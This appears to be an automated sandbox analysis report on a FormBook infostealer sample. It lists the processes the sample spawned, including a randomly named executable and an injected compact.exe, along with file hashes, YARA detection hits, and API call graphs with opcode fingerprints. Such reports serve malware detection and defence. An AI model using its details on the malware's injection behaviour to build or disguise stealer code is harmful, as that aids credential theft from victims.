                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1971533263.0000000001E70000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.1971533263.0000000001E70000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                        Reputation:low
                                                                                                        Has exited:true

                                                                                                        Target ID:2
                                                                                                        Start time:08:45:44
                                                                                                        Start date:10/10/2024
                                                                                                        Path:C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe"
                                                                                                        Imagebase:0xb60000
                                                                                                        File size:140'800 bytes
                                                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.3604571155.0000000003490000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.3604571155.0000000003490000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                                        Reputation:high
                                                                                                        Has exited:false

                                                                                                        Target ID:5
                                                                                                        Start time:08:45:46
                                                                                                        Start date:10/10/2024
                                                                                                        Path:C:\Windows\SysWOW64\compact.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Windows\SysWOW64\compact.exe"
                                                                                                        Imagebase:0xd00000
                                                                                                        File size:41'472 bytes
                                                                                                        MD5 hash:5CB107F69062D6D387F4F7A14737220E
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3604353824.00000000035A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3604353824.00000000035A0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3604458798.00000000035F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3604458798.00000000035F0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3603288385.00000000030E0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3603288385.00000000030E0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                        Reputation:moderate
                                                                                                        Has exited:false

                                                                                                        Target ID:6
                                                                                                        Start time:08:45:59
                                                                                                        Start date:10/10/2024
                                                                                                        Path:C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe"
                                                                                                        Imagebase:0xb60000
                                                                                                        File size:140'800 bytes
                                                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3606411027.0000000005500000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3606411027.0000000005500000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                        Reputation:high
                                                                                                        Has exited:false

                                                                                                        Target ID:7
                                                                                                        Start time:08:46:11
                                                                                                        Start date:10/10/2024
                                                                                                        Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                        Imagebase:0x7ff6bf500000
                                                                                                        File size:676'768 bytes
                                                                                                        MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true


                                                                                                          Execution Graph

                                                                                                          Execution Coverage:1.2%
                                                                                                          Dynamic/Decrypted Code Coverage:5.4%
                                                                                                          Signature Coverage:14%
                                                                                                          Total number of Nodes:129
                                                                                                          Total number of Limit Nodes:10

                                                                                                          Control-flow Graph

                                                                                                          control_flow_graph 51 e07623-e0764c call e1f223 54 e07652-e07660 call e1f823 51->54 55 e0764e-e07651 51->55 58 e07670-e07681 call e1dba3 54->58 59 e07662-e0766d call e1fac3 54->59 64 e07683-e07697 LdrLoadDll 58->64 65 e0769a-e0769d 58->65 59->58 64->65
                                                                                                          APIs
                                                                                                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00E07695
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971161309.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1971147679.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_df0000_NjjLYnPSZr.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: Load
                                                                                                          • String ID:
                                                                                                          • API String ID: 2234796835-0
                                                                                                          • Opcode ID: 695220c7de908a7325642339f6d976c34b7cf8201cc9d60be99d785a75aec0d5
                                                                                                          • Instruction ID: a25c42d50df94734ff3d0ed9d6e4f12d61d5f37397e8a5aa8d172792ef7a9e79
                                                                                                          • Opcode Fuzzy Hash: 695220c7de908a7325642339f6d976c34b7cf8201cc9d60be99d785a75aec0d5
                                                                                                          • Instruction Fuzzy Hash: 15011EB5D0420DBBDB10DBE4DC42FDDB7B8AB54308F0081A5E909A7281F671EB54CB91

                                                                                                          Control-flow Graph

                                                                                                          control_flow_graph 77 e1c4a3-e1c4d9 call df4873 call e1d6b3 NtClose
                                                                                                          APIs
                                                                                                          • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 00E1C4D4
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971161309.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1971147679.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_df0000_NjjLYnPSZr.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: Close
                                                                                                          • String ID:
                                                                                                          • API String ID: 3535843008-0
                                                                                                          • Opcode ID: fd7f006d6df5722d54c2d7a0f69f996be2d803c51140795f17f14a41dbade8c8
                                                                                                          • Instruction ID: 813e5cfcae781d7c4b86630809fa043a5b3f51b630526ed0e8f5e9b76b20fe4b
                                                                                                          • Opcode Fuzzy Hash: fd7f006d6df5722d54c2d7a0f69f996be2d803c51140795f17f14a41dbade8c8
                                                                                                          • Instruction Fuzzy Hash: 0AE046322042087BD620BE59EC02E9BB7ADDBC5750F008415FA08A7242C671F91187F5

                                                                                                          Control-flow Graph

                                                                                                          control_flow_graph 91 1062b60-1062b6c LdrInitializeThunk
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeThunk
                                                                                                          • String ID:
                                                                                                          • API String ID: 2994545307-0
                                                                                                          • Opcode ID: f56c3f9efa4c839a4dfbd07574ba4a3f20c8df062877715cb4d5805c81eb4f57
                                                                                                          • Instruction ID: 6d5237f6bd414a9e99391eb0fa6da1e4f3f20399f4ad4f2e1beefd0a31ecb1c0
                                                                                                          • Opcode Fuzzy Hash: f56c3f9efa4c839a4dfbd07574ba4a3f20c8df062877715cb4d5805c81eb4f57
                                                                                                          • Instruction Fuzzy Hash: 8590026160240013510571588418616400A97E0201B55C032E1414590DC52589916239

                                                                                                          Control-flow Graph

                                                                                                          control_flow_graph 93 1062df0-1062dfc LdrInitializeThunk
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeThunk
                                                                                                          • String ID:
                                                                                                          • API String ID: 2994545307-0
                                                                                                          • Opcode ID: 0e515be520e27b6063c1260777a851db5f21b5c7ccc3d300e875fc7dbafa7580
                                                                                                          • Instruction ID: 79bc78b5bafbf0c4261f879b9e78d1113e9d34510f9cebbc85aab05a96d7ff08
                                                                                                          • Opcode Fuzzy Hash: 0e515be520e27b6063c1260777a851db5f21b5c7ccc3d300e875fc7dbafa7580
                                                                                                          • Instruction Fuzzy Hash: CF90023160140423E11171588508707000997D0241F95C423A0824558DD6568A52A235

                                                                                                          Control-flow Graph

                                                                                                          control_flow_graph 92 1062c70-1062c7c LdrInitializeThunk
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeThunk
                                                                                                          • String ID:
                                                                                                          • API String ID: 2994545307-0
                                                                                                          • Opcode ID: 060180c1348e388f033c26336ab7c1bc8d76db126dc4d1be4698cddd67c79ca9
                                                                                                          • Instruction ID: ebd15194420f866bcfa9776b30be70a9e159470a2dd4d3f3c3446a24b98bf0b7
                                                                                                          • Opcode Fuzzy Hash: 060180c1348e388f033c26336ab7c1bc8d76db126dc4d1be4698cddd67c79ca9
                                                                                                          • Instruction Fuzzy Hash: 7290023160148812E1107158C40874A000597D0301F59C422A4824658DC69589917235

                                                                                                          Control-flow Graph

                                                                                                          control_flow_graph 94 10635c0-10635cc LdrInitializeThunk
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeThunk
                                                                                                          • String ID:
                                                                                                          • API String ID: 2994545307-0
                                                                                                          • Opcode ID: 9c0d891bc838e2f118b9eebf6233d863dcc56b12758b6ccc4d787dc86be0817f
                                                                                                          • Instruction ID: de9d99b20610e14d02c56afc1bb0be627980926157333f03cc5df5aab0985d0f
                                                                                                          • Opcode Fuzzy Hash: 9c0d891bc838e2f118b9eebf6233d863dcc56b12758b6ccc4d787dc86be0817f
                                                                                                          • Instruction Fuzzy Hash: B7900231A0550412E10071588518706100597D0201F65C422A0824568DC7958A5166B6
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971161309.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1971147679.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_df0000_NjjLYnPSZr.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 4f948744959b1fbeba504341c4923f80ab3134e929c92108e6691fe96c6add28
                                                                                                          • Instruction ID: 3ada91c55b6dbed40bec7de3b87f4616567d9c8f95bb0d552425b4e31c7c2695
                                                                                                          • Opcode Fuzzy Hash: 4f948744959b1fbeba504341c4923f80ab3134e929c92108e6691fe96c6add28
                                                                                                          • Instruction Fuzzy Hash: C7F1A271D0021AAFDF14DF94CD81AFEB7B8AF44304F5491A9E449B7281DB70AA85CFA1

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          • PostThreadMessageW.USER32(s1951-LPl,00000111,00000000,00000000), ref: 00E03F10
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971161309.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1971147679.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_df0000_NjjLYnPSZr.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: MessagePostThread
                                                                                                          • String ID: s1951-LPl$s1951-LPl
                                                                                                          • API String ID: 1836367815-3874984991
                                                                                                          • Opcode ID: 85e6faca536f5e2f5253e4a3436d354225dd990bb079f20668bfad4efedf7c52
                                                                                                          • Instruction ID: d437693634a689c8992611bb838f2b309d257f3da474243955aeb6405ee9f96d
                                                                                                          • Opcode Fuzzy Hash: 85e6faca536f5e2f5253e4a3436d354225dd990bb079f20668bfad4efedf7c52
                                                                                                          • Instruction Fuzzy Hash: 3C11E172E40219BADB2096A4CC02FDE7BBCDF81B50F048055FA04BB2C1D7B8570687A5

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 14 e03e93-e03ea3 15 e03eac-e03f01 call e1efd3 call e07623 call df47e3 call e14d73 14->15 16 e03ea7 call e1e5c3 14->16 25 e03f23-e03f28 15->25 26 e03f03-e03f14 PostThreadMessageW 15->26 16->15 26->25 27 e03f16-e03f20 26->27 27->25
                                                                                                          APIs
                                                                                                          • PostThreadMessageW.USER32(s1951-LPl,00000111,00000000,00000000), ref: 00E03F10
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971161309.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1971147679.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_df0000_NjjLYnPSZr.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: MessagePostThread
                                                                                                          • String ID: s1951-LPl$s1951-LPl
                                                                                                          • API String ID: 1836367815-3874984991
                                                                                                          • Opcode ID: 71f89b66b1cdfc5221d419db0958a8f7bf41cb805fb256bdc9627ad2fb7205be
                                                                                                          • Instruction ID: 93150a401de15aae7e8c507e3e5dc169ebad798cc2df44ecc9579a2b666bcab8
                                                                                                          • Opcode Fuzzy Hash: 71f89b66b1cdfc5221d419db0958a8f7bf41cb805fb256bdc9627ad2fb7205be
                                                                                                          • Instruction Fuzzy Hash: 05018072E44218B6EB21A6A49C02FDF7BBC9F41B54F048155FA047B2C1E6B8670687E6

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 28 e1c803-e1c844 call df4873 call e1d6b3 RtlFreeHeap
                                                                                                          APIs
                                                                                                          • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 00E1C83F
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971161309.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1971147679.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_df0000_NjjLYnPSZr.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: FreeHeap
                                                                                                          • String ID: xc
                                                                                                          • API String ID: 3298025750-1377889829
                                                                                                          • Opcode ID: 490d4aa338b1141acf51ea861ddb7e454b29fd6b8ca857531c7a4f5f5ffddfb1
                                                                                                          • Instruction ID: cf1f2e1057c194b2ac338a1cc7adf5081be1f9685f38694c8950384a37057469
                                                                                                          • Opcode Fuzzy Hash: 490d4aa338b1141acf51ea861ddb7e454b29fd6b8ca857531c7a4f5f5ffddfb1
                                                                                                          • Instruction Fuzzy Hash: 07E06D712042487BD610EE58EC41E9B33ACEFC5710F004019F908A7242DA70B9558AB9

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 66 e1c7b3-e1c7f4 call df4873 call e1d6b3 RtlAllocateHeap
                                                                                                          APIs
                                                                                                          • RtlAllocateHeap.NTDLL(?,00E0E43E,?,?,00000000,?,00E0E43E,?,?,?), ref: 00E1C7EF
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971161309.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1971147679.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_df0000_NjjLYnPSZr.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: AllocateHeap
                                                                                                          • String ID:
                                                                                                          • API String ID: 1279760036-0
                                                                                                          • Opcode ID: eb9874a444ee62c078bc1252656f96f3d80ae0437e80c8a870960e1353e5580f
                                                                                                          • Instruction ID: 872bcd7f2054a7b2a8c67f73e69aca7acd867bf958a36c71408c27cdfee78ef4
                                                                                                          • Opcode Fuzzy Hash: eb9874a444ee62c078bc1252656f96f3d80ae0437e80c8a870960e1353e5580f
                                                                                                          • Instruction Fuzzy Hash: 70E01A723042487BD614EE99EC41EAB77ACEFC9B10F008919FA09A7241D671B911CBB9

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 71 e076b3-e076b9 73 e07677-e07681 71->73 74 e076bb-e076c0 71->74 75 e07683-e07697 LdrLoadDll 73->75 76 e0769a-e0769d 73->76 75->76
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971161309.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1971147679.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_df0000_NjjLYnPSZr.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 9d818a1eb94441588e1bcdc7ed2bdd2e64c3d15017c9df31bca0029b1348ad53
                                                                                                          • Instruction ID: 762d5257bd6841bd00a157e1496dbd9d2d388ba292e4ef7c2d63011cc9fa4222
                                                                                                          • Opcode Fuzzy Hash: 9d818a1eb94441588e1bcdc7ed2bdd2e64c3d15017c9df31bca0029b1348ad53
                                                                                                          • Instruction Fuzzy Hash: 1CE09270E0450EBBEF51CF85EC41FA8BBB5EB55358F008291E919A6180F272EA85CB91

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 82 e1c853-e1c88c call df4873 call e1d6b3 ExitProcess
                                                                                                          APIs
                                                                                                          • ExitProcess.KERNEL32(?,00000000,00000000,?,58649064,?,?,58649064), ref: 00E1C887
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971161309.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1971147679.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_df0000_NjjLYnPSZr.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: ExitProcess
                                                                                                          • String ID:
                                                                                                          • API String ID: 621844428-0
                                                                                                          • Opcode ID: adef65bbb13c132bae0e59a0c263315a5c1748308e9f93dab41bc55e43cd02af
                                                                                                          • Instruction ID: 0cc4bb1bc1640d7bc3e784dd364e6f69f13a2f10059cd4b465be1f2b50cc8f67
                                                                                                          • Opcode Fuzzy Hash: adef65bbb13c132bae0e59a0c263315a5c1748308e9f93dab41bc55e43cd02af
                                                                                                          • Instruction Fuzzy Hash: CFE046362046087BC220FAA9DC41FDB77ACEBC5760F108419FA08A7241D6B0B9008AF4

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 87 1062c0a-1062c0f 88 1062c11-1062c18 87->88 89 1062c1f-1062c26 LdrInitializeThunk 87->89
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeThunk
                                                                                                          • String ID:
                                                                                                          • API String ID: 2994545307-0
                                                                                                          • Opcode ID: 9e5cc55507b1157876a543b7e3c9a2d89386f9cfb28d1e51f618555ed6249088
                                                                                                          • Instruction ID: 6d86120faf6238cbd15f4ffa2c51dc0128570c90c2310e7c6eb345e307dead2b
                                                                                                          • Opcode Fuzzy Hash: 9e5cc55507b1157876a543b7e3c9a2d89386f9cfb28d1e51f618555ed6249088
                                                                                                          • Instruction Fuzzy Hash: 62B09B71D015C5D9EA51F764460C717794477D0711F15C072D2430641F4738C1D1E275
                                                                                                          Strings
                                                                                                          • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 010D8DD3
                                                                                                          • This failed because of error %Ix., xrefs: 010D8EF6
                                                                                                          • <unknown>, xrefs: 010D8D2E, 010D8D81, 010D8E00, 010D8E49, 010D8EC7, 010D8F3E
                                                                                                          • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 010D8F26
                                                                                                          • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 010D8E3F
                                                                                                          • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 010D8E86
                                                                                                          • a NULL pointer, xrefs: 010D8F90
                                                                                                          • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 010D8DB5
                                                                                                          • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 010D8F2D
                                                                                                          • *** then kb to get the faulting stack, xrefs: 010D8FCC
                                                                                                          • The resource is owned exclusively by thread %p, xrefs: 010D8E24
                                                                                                          • *** A stack buffer overrun occurred in %ws:%s, xrefs: 010D8DA3
                                                                                                          • The instruction at %p tried to %s , xrefs: 010D8F66
                                                                                                          • *** An Access Violation occurred in %ws:%s, xrefs: 010D8F3F
                                                                                                          • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 010D8FEF
                                                                                                          • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 010D8DC4
                                                                                                          • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 010D8D8C
                                                                                                          • *** enter .exr %p for the exception record, xrefs: 010D8FA1
                                                                                                          • The resource is owned shared by %d threads, xrefs: 010D8E2E
                                                                                                          • Go determine why that thread has not released the critical section., xrefs: 010D8E75
                                                                                                          • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 010D8E4B
                                                                                                          • an invalid address, %p, xrefs: 010D8F7F
                                                                                                          • write to, xrefs: 010D8F56
                                                                                                          • *** Resource timeout (%p) in %ws:%s, xrefs: 010D8E02
                                                                                                          • The instruction at %p referenced memory at %p., xrefs: 010D8EE2
                                                                                                          • read from, xrefs: 010D8F5D, 010D8F62
                                                                                                          • *** Inpage error in %ws:%s, xrefs: 010D8EC8
                                                                                                          • The critical section is owned by thread %p., xrefs: 010D8E69
                                                                                                          • *** enter .cxr %p for the context, xrefs: 010D8FBD
                                                                                                          • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 010D8F34
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                                                          • API String ID: 0-108210295
                                                                                                          • Opcode ID: 85ce4e380bfd21a7e5505efe6003ce4ef75ea0f99e91dd2da2eef1fb46a34022
                                                                                                          • Instruction ID: 27b9ddb8be2468626b3c606c798d8a880564a3337803dc87bdf89421ba02e98b
                                                                                                          • Opcode Fuzzy Hash: 85ce4e380bfd21a7e5505efe6003ce4ef75ea0f99e91dd2da2eef1fb46a34022
                                                                                                          • Instruction Fuzzy Hash: F0812879A00301BFDB11AB99DC85EAF3F75EF56B24F414089F2886F156E3B98411CB61
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: ApphelpCheckModule$Could not locate procedure "%s" in the shim engine DLL$LdrpGetShimEngineInterface$SE_DllLoaded$SE_DllUnloaded$SE_GetProcAddressForCaller$SE_InitializeEngine$SE_InstallAfterInit$SE_InstallBeforeInit$SE_LdrEntryRemoved$SE_LdrResolveDllName$SE_ProcessDying$SE_ShimDllLoaded$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                          Strings
                                                                                                          • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlpSetPreferredUILanguages is not a valid multi-string!, xrefs: 010C5A84
                                                                                                          • InstallLanguageFallback, xrefs: 010C6050
                                                                                                          • @, xrefs: 010C6027
